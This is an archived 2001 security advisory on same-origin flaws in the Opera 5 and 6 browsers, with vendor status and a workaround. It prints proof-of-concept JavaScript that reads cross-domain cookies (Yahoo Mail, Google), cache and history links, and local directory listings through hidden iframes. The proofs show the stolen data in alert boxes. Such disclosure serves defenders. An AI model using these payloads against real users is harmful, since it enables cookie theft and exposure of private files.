COMMAND

	Opera web browser multiple java vulnerabilities

SYSTEMS AFFECTED

	Opera 5.12/Windows, Opera 5.0/Linux - probably other versions

PROBLEM

	In Georgi Guninski security advisory #51 [www.guninski.com] :
	

	

	Several javascript vulnerabilities in Opera
	

	Systems affected: Opera 5.12/Windows, Opera 5.0/Linux -  probably  other
	versions
	

	Risk: Medium Date: 15 November 2001
	

	Legal Notice: This Advisory is Copyright (c) 2001 Georgi  Guninski.  You
	may distribute it unmodified. You may not modify it  and  distribute  it
	or distribute parts of it without the author\'s written permission.
	

	Disclaimer: The information in this advisory  is  believed  to  be  true
	based on experiments though it may be false. The opinions  expressed  in
	this advisory and program are my own and not of any company.  The  usual
	standard disclaimer applies, especially the fact  that  Georgi  Guninski
	is not liable for any damages caused by direct or indirect  use  of  the
	information or functionality  provided  by  this  advisory  or  program.
	Georgi Guninski bears no responsibility for content or  misuse  of  this
	advisory or program or any derivatives thereof.
	

	Anouncement: I am looking for contracts in the  security  area  -  check
	http://www.guninski.com
	

	Description: Opera is a multiplatform web  browser.  There  are  several
	javascript vulnerabilities in it, basically allowing script  in  a  page
	to access a page and its properties in another domain -  AFAIK  Netscape
	call this \"Same Origin Vulnerability\". It is possible a script in  web
	page to access at least cookies and links in arbitrary domains to  which
	the user has access. It is also possible a script to read the the  links
	in  the  user\'s  cache  and  history  which  at  least   have   privacy
	implications if not more.  In  some  cases  cookies  and  links  in  the
	cahe/history   may    containg    sensitive    information    such    as
	usernames/passwords etc.
	

	

	Details:
	

	Examine the following scripts:
	

	-1.----------------------------------
	 

	a=window.open(\"http://mail.yahoo.com\");

	function f()

	{

	xx=a.document.cookie;

	alert(\"hi\"+xx);

	a.document.open();

	a.document.write(\"<h1>aa</h1><script>x=window.open(\'http://mail.yahoo.com\');setTimeout(\'z=x.document.cookie;alert(z);\',5000)</\"+\"script>\");

	a.document.close();

	}

	setTimeout(\"f()\",5000);

	

	-----------------------------------
	

	-2.--------------------------------
	 

	a=window.open(\"about:cache\");

	function f()

	{

	xx=a.document.links[2];

	alert(\"hi=\"+xx);

	}

	setTimeout(\"f()\",5000);

	

	-----------------------------------
	

	In        addiotion        the         HotJava         explot         at
	http://www.guninski.com/hotjava1-desc.html  works   as   Jay@InfoAve.net
	pointed out.
	

	Andreas Sandblad [http://www.homer.nu/security/opera/] added :
	

	One thing that wasn\'t mentioned and might not be obvious  is  that  the
	vulnerability can also be used to list files on the  user\'s  harddrive.
	This is because the url file://c:/ is seen  as  a  html-page  by  Opera.
	Thus we can use document.links to retrieve filenames and directories.
	

	Opera released 6.0 beta 1 for windows three  days  ago  and  it\'s  also
	vulnerable. In fact it\'s actually much easier to write the  script  for
	it and easier to make the attack  invisible  since  Opera  added  better
	support to iframe.
	

	Opera 6.0 (not 5.x): List files and directories in c:/
	 

	<iframe id=\"rewrite\" src=\"file://c:/\" width=0 height=0></iframe>

	<script language=\"javascript\">

	s=\"javascript:t=\\\'\\\';for(i=0;(c=document.links.item(i));i++){t+=c};alert(t);\";

	setTimeout(\'parent.rewrite.document.location=\"\'+s+\'\"\',1);

	</script>

	

	Opera 6.0 (not 5.x): Get google cookie
	 

	<iframe id=\"rewrite\" src=\"http://www.google.com/\" width=0 height=0></iframe>

	<script language=\"javascript\">

	setTimeout(\'parent.rewrite.document.location=\"javascript:alert(document.cookie)\"\',8000);

	</script>

	

	

	

	

SOLUTION

	Workaround: Disable javascript (Opera suggest enabling \"Use cookies  to
	trace password protected documents\")
	

	Vendor status: The vendor was notified on 5 November 2001 and was  asked
	whether  a  fix   shall   be   issued   and   when.   The   reply   was:
	------------------------------------ You should be able to  resolve  the
	cookie issue by enabling  \"Use  cookies  to  trace  password  protected
	documents\", which means that pages  with  password  protection  aren\'t
	cached, cookies aren\'t stored,  the  URL  shouldn\'t  be  displayed  in
	History, etc. This is a \"paranoia\"  option,  and  makes  a  few  pages
	unusable. As you are probably aware, many web technologies aren\'t  very
	secure, but it is inconvenient for the user to block these. This is  why
	the user should be given a choice to block privacy related  information.
	------------------------------------